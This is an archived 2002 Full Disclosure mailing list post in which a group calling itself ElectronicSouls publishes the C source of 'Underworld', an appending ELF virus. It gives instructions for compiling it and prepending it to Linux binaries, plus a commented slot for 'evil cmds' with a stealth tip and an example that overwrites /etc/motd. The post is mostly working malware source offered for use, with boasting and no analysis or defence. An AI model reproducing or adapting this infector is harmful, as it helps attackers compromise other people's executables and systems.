Full Disclosure mailing list archives
[ElectronicSouls] - Not One of Us Is Owned
From: es () hush com
Date: Fri, 29 Nov 2002 18:14:12 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, As the title of this email suggests, no members of our crew are owned. Please enjoy the code. # cat 4553underworld.c /* ----------------------------------------------------------- [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW] ------------------- DO NOT DISTRIBUTE ! ------------------- ----------------------------------------------------------- [Underworld] - append ELF infect0r (C) BrainStorm - 01-2002 ----------------------------------------------------------- Information : +++++++++++++ This ELF Infector uses the appendage infection tekneeq! that means to two Executeables are appended together. It worx like that : _________________ | | The Parasite Code is first, thats why | [PARASITE CODE] | it needs to know its own size. |_________________| | | the host code stays untouched and gets | [ORIGINAL CODE] | extracted and executed from the virus. |_________________| ----------------------------------------------------------- to get it working : +++++++++++++++++++ 'gcc code.c -O2 -o code', then get the file size and change the define in the code, now recompile and we are done ;) ----------------------------------------------------------- to infect a binary : ++++++++++++++++++++ cat /bin/binary >> underworld you get the point ... ----------------------------------------------------------- special thanks to : +++++++++++++++++++ ghQst and SectorX for making me interested in ELF infection and for beeing there for me since back in the days =) ! shouts go out to all ElectronicSouls members - j00 r0ck =) ----------------------------------------------------------- [ElectronicSouls] - keep the spirit alive ! ----------------------------------------------------------- */ /* KUNG FOO ! */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #define PARASIZE 14985 /* dont forget to change me ! */ #define TEMP ".para.tmp" /* tmp file */ #define KILL(X) exit(1) /* what could this be ? */ int main(int argc, char *argv[], char *envp[]) { int input, output, lenght; char *dope; struct stat stat; printf("\n\n Welcome on the other side ;> \n 0x45 0x53 ! ph34r our krad tekneeqz !@# \n"); /* [insert evil cmds here!] be sure to hide the output of external programs to be more stealth .. heh example: system("echo "did you know? i 0wn j00!" > /etc/motd"); you get the point ;) */ input = open("/proc/self/exe", O_RDONLY); if (input < 0) KILL("open(input)"); if (fstat(input, &stat) < 0) KILL("fstat"); lenght = stat.st_size - PARASIZE; dope = malloc(lenght); if (dope == NULL) KILL("malloc"); if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)"); if (read(input, dope, lenght) != lenght) KILL("read(input)"); close(input); output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode); if (output < 0) KILL("open(output)"); if (write(output, dope, lenght) != lenght) KILL("write(output)"); free(dope); close(output); exit(execve(TEMP, argv, envp)); } /* quick and dirty, small but effective !@# */ /* im new into this so send flames to /dev/null wh0r3z ..show better code 1st ;) */ # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "So Tired, We Have Insomnia" -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3oHwkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt9aYAoLF/hFJ55U7r bAa57+3t/dUOt/iJAJ4kFQNfEdrP900U3IfMU1ZwssnAgw== =BZRe -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Not One of Us Is Owned es (Nov 29)